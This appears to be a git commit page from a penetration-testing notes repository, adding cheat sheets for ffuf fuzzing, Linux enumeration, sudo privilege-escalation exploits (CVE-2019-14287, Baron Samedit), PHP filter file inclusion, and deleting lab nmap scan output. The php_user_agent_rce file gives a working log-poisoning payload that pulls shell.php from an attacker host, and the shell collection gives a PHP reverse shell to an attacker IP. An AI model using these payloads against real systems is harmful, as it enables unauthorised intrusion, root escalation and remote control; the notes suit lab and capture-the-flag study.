whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

fuff et al

This commit is contained in:
Stefan Friese 2021-08-27 00:26:26 +02:00
parent d4648a2f18
commit 853d3ee2bb
14 changed files with 162 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
enumeration/Sublist3r Submodule

@ -0,0 +1 @@
Subproject commit 729d649ec5370730172bf6f5314aafd68c874124

41
enumeration/docs/ffuf.md Normal file
View File

@ -0,0 +1,41 @@
# Fuzz Faster U Fool
## Usage
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
```
* Fuzz dirs
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```
* Fuzz files
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
```
### Fuzz parameters
```sh
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
```
* Fuzz values
```sh
seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
```
* Fuzz Post Methods
```sh
ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
```
### Fuzz Subdomains
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```
* Fuzz Vhosts & Server Blocks
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
```
### Proxy
* `-replay-proxy <IP>` or `-x <ProxyIP>`

37
enumeration/docs/linux_basics.md Normal file
View File

@ -0,0 +1,37 @@
# Linux Basic Enumeration
```sh
less ~/.bash_history
```
```sh
cat /etc/*-release
cat /proc/version
uname -a
```
```sh
sudo -V
sudo -L
```
* Check if is writeable
```sh
vim /etc/passwd
vim /etc/hosts
```
```sh
crontab -l
```
* Find interesting files
```sh
find / -perm /6000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name "*.log" 2>/dev/null
find / -type f -name "*.bak" 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null
```
* Open Sockets
```sh
lsof -i
netstat -natup
ss -natup
```

4
enumeration/nmap-full.gnmap
View File

@ -1,4 +0,0 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Host: 10.10.156.247 () Status: Up
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

19
enumeration/nmap-full.nmap
View File

@ -1,19 +0,0 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Nmap scan report for 10.10.156.247
Host is up (0.064s latency).
Not shown: 64293 closed ports, 1231 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
31337/tcp open Elite
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

35
enumeration/nmap-full.xml
View File

@ -1,35 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247 -->
<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.156.247" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports><extraports state="closed" count="64293">
<extrareasons reason="resets" count="64293"/>
</extraports>
<extraports state="filtered" count="1231">
<extrareasons reason="no-responses" count="1231"/>
</extraports>
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
</ports>
<times srtt="64161" rttvar="6610" to="100000"/>
</host>
<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

9
exploit/sudo/CVE_2019_14287.md Normal file
View File

@ -0,0 +1,9 @@
# CVE-2019-14287
* Versions < 1.8.28
## Usage
* Integer overflow with resulting root status.
```sh
sudo -u#-1 <app>
```

13
exploit/sudo/baron_samedit.md Normal file
View File

@ -0,0 +1,13 @@
# CVE-2021-3156 Baron Samedit
* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via
```sh
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
```

6
exploit/web/php/php_base64_filter.md Normal file
View File

@ -0,0 +1,6 @@
# PHP Filter
* Include into GET query, and get index page, for example
```sh
<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
```

0
exploit/web/php_image_exif.md → exploit/web/php/php_image_exif.md
View File

19
exploit/web/php/php_user_agent_rce.md Normal file
View File

@ -0,0 +1,19 @@
# RCE inside HTTP Request
* User Agent can be filled with php code
```sh
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
[...]
```
* copied from browser as curl command:
```
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
```
* go to the access log
```sh
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
```
* Afterwards visit `10.10.211.157/monkey.php`

1
misc/printer_hacking/PRET Submodule

@ -0,0 +1 @@
Subproject commit 40505ce3869707efb7890b55519b3ee829adefbd

4
misc/printer_hacking/preta.md Normal file
View File

@ -0,0 +1,4 @@
# Printer Hacking
* [Preta](https://github.com/RUB-NDS/PRET)
* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)

31
reverse_shells/docs/shell_collection.md Normal file
View File

@ -0,0 +1,31 @@
# Upgrade Reverse Shell
## Via interpreter
### PHP
* reverse shell
```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```php
php -r 'exec ("/bin/bash")";'
```
* Sometimes even
```php
php -e 'exec "/bin/bash";'
```
### Python
```python
python -c 'import pty; pty.spawn("/bin/bash")'
```
## Next
1. `ctrl` + `z`
2. `stty echo -raw`
3. `fg`
4. `export TERM=xterm`
## Via SSH
* `ssh-keygen`
* copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target